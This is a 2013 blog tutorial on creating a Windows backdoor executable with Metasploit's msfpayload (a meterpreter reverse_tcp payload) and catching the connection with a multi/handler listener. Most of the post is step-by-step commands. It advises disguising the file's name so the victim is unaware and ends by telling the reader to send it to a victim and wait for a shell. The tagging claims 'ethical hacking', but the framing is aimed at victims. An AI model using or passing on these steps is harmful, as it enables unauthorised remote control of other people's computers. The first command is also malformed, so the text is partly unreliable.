Saturday, February 9, 2013

Creating a simple exe backdoor

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

In this scenario, we are going to create a simple backdoor which is an infected executable file to be run on a windows system. You need to provide your IP address which can be obtained by the command "ifconfig" together with the port you want your  backdoor to connect to. The custom port for this connection is usually 443 or 4444, but you can choose any other port.

issue the following command:

root@shinobi:~# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 > root/Desktop > backdoor.exe

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

So, as you can see from this example, a backdoor.exe has been created in the "Home" folder. In the above example just change the ip address with yours,, and name it to whatever you like, you don't like after all to tell your victim that this is a backdoor !! :-)

Now, we have finished with the first part, but what is next? 
We simply need a listener which will handle the connection back to our exploit machine.

First of all, we need to open metasploit console:


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

Now ,we need to use multihandler for a reverse connection:

msf >  use exploit/multi/handler

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

Now , we set up our payload:

msf >  set payload windows/meterpreter/reverse_tcp

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

Now, we have to set up the lhost & lport:

msf >  set lhost

msf >  set lport 4444

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

Last phase now, is to type "exploit" 

msf > exploit

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting

We are ready for exploiting the remote machine. Send the backdoor to a victim and wait for a connection ;-)

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